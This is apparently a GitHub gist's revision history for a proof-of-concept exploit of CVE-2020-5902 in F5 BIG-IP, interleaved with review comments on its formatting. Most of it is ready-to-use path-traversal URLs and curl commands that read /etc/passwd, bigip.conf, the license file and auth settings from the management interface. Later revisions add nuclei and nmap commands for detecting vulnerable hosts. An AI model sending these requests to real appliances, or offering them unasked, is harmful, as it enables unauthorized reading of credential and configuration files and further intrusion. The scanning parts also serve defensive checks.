@vxrv
Forked from cihanmehmet/CVE-2020-5902.md
Created July 5, 2020 21:46

Revisions

  1. @cihanmehmet cihanmehmet revised this gist Jul 5, 2020. 1 changed file with 11 additions and 2 deletions.
    13 changes: 11 additions & 2 deletions CVE-2020-5902.md
    @@ -1,4 +1,4 @@
    # 🔸 BIGIP CVE-2020-5902 Exploit POC
    # 🔸 BIGIP CVE-2020-5902 Exploit POC 👀
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    ```powershell
    https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
    @@ -16,7 +16,7 @@ https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/
    https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
    ```
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    ## 🎯 Manuel POC
    ## 🎯 Manuel POC 🔥
    ```ruby
    curl -sk 'https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
    ```
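Review bot: the changed heading still reads "Manuel POC"; it should be "Manual POC". The `curl` command under it sits in a fence tagged `ruby`, which mislabels a shell command; `bash` or `console` matches what the reader actually types.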
    @@ -34,3 +34,12 @@ nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    ![image](https://i.ibb.co/fNm0JGL/2.png)

    ## 🔎 NMAP Script for CVE-2020-5902
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    ```powershell
    wget https://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve2020-5902.nse
    ```
    ```console
    nmap -p443 {IP} --script=http-vuln-cve2020-5902.nse
    ```
    ![image](https://i.ibb.co/S0df0bk/5.png)
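Review bot: the added `wget` line fetches `http-vuln-cve2020-5902.nse` from the `master` branch of a personal repository, so the script a reader downloads later may differ from the one shown in the screenshot. Pin the URL to a commit hash, publish a checksum next to it, and tell the reader to read the script before passing it to `nmap --script`, since NSE scripts run with the privileges of the scanner. The two fences are also tagged `powershell` and `console` for what is one shell session; a single `bash` fence would be clearer.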
  2. @cihanmehmet cihanmehmet revised this gist Jul 5, 2020. 1 changed file with 12 additions and 4 deletions.
    16 changes: 12 additions & 4 deletions CVE-2020-5902.md
    @@ -1,12 +1,12 @@
    ## 🔸 BIGIP CVE-2020-5902 Exploit POC
    # 🔸 BIGIP CVE-2020-5902 Exploit POC
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    ```powershell
    https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
    ```
    ```console
    https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
    ```
    ```diff
    ```ruby
    https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
    ```
    ```bash
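Review bot: the fence around the `getTabSet.jsp` URL changes its tag from `diff` to `ruby`, and neither describes a bare URL. The tags in this file (`powershell`, `console`, `ruby`, `bash`, `python`) appear to be picked for highlight colour rather than content; use `text` or no tag for URLs so that renderers and any tooling that reads the fence language are not misled.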
    @@ -15,14 +15,22 @@ https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/
    ```python
    https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
    ```
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    ## 🎯 Manuel POC
    ```ruby
    curl -sk 'https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
    ```
    ```bash
    curl -sk 'https://{IP}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
    ```
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    ## 📜 Nuclei Detect CVE-2020-5902
    https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/CVE-2020-5902.yaml
    ```bash

    ```console
    nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt
    ```
    ![image](https://i.ibb.co/hHsWjrk/4.png)
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    ![image](https://i.ibb.co/fNm0JGL/2.png)
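Review bot: the added `curl` line with `{IP}` repeats the `{host}` line directly above it and differs only in the placeholder name; keep one and state that the placeholder takes a hostname or an address. Both lines pass `-k`, which disables TLS certificate verification, and the text never says why; a one-line remark would stop readers from carrying the flag into other scripts by habit.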


  3. @cihanmehmet cihanmehmet revised this gist Jul 5, 2020. 1 changed file with 10 additions and 4 deletions.
    14 changes: 10 additions & 4 deletions CVE-2020-5902.md
    @@ -1,4 +1,5 @@
    ## BIGIP CVE-2020-5902 Exploit POC
    ## 🔸 BIGIP CVE-2020-5902 Exploit POC
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    ```powershell
    https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
    ```
    @@ -14,9 +15,14 @@ https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/
    ```python
    https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
    ```

    ## Nuclei Detect CVE-2020-5902
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    ## 📜 Nuclei Detect CVE-2020-5902
    https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/CVE-2020-5902.yaml
    ```bash
    nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt
    ```
    ```
    ![image](https://i.ibb.co/hHsWjrk/4.png)
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    ![image](https://i.ibb.co/fNm0JGL/2.png)
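Review bot: in the Nuclei section the command depends on two things the text does not explain: the template path `~/tool/nuclei/nuclei-templates/...` is one user's checkout location, and `https.txt` is never described. Say that the path is wherever `nuclei-templates` is cloned and that `-l` takes a file with one target per line. The two screenshots added here carry only the alt text `image` and are hosted on a third-party image service; descriptive alt text and a pasted sample of the output would survive if the images disappear.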


  4. @cihanmehmet cihanmehmet revised this gist Jul 5, 2020. 1 changed file with 2 additions and 0 deletions.
    2 changes: 2 additions & 0 deletions CVE-2020-5902.md
    @@ -5,10 +5,12 @@ https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/
    ```console
    https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
    ```
    ```diff
    https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
    ```
    ```bash
    https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
    ```
    ```python
    https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
    ```
  5. @cihanmehmet cihanmehmet created this gist Jul 5, 2020.
    20 changes: 20 additions & 0 deletions CVE-2020-5902.md
    @@ -0,0 +1,20 @@
    ## BIGIP CVE-2020-5902 Exploit POC
    ```powershell
    https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
    ```
    ```console
    https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
    ```
    https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
    ```
    ```bash
    https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
    ```python
    https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
    ```

    ## Nuclei Detect CVE-2020-5902
    https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/CVE-2020-5902.yaml
    ```bash
    nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt
    ```
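Review bot: the code fences in the new file are unbalanced. The `getTabSet.jsp` URL has a closing fence after it but no opening one, and the `bash` fence opened before the `bigip.license` URL is not closed before the `python` fence starts, so the blocks from the third URL onward will not render as intended. Give each URL its own opening and closing fence. The file also lists request paths without a link to the vendor advisory or the fixed versions; adding that reference tells a reader who gets a match what to upgrade to.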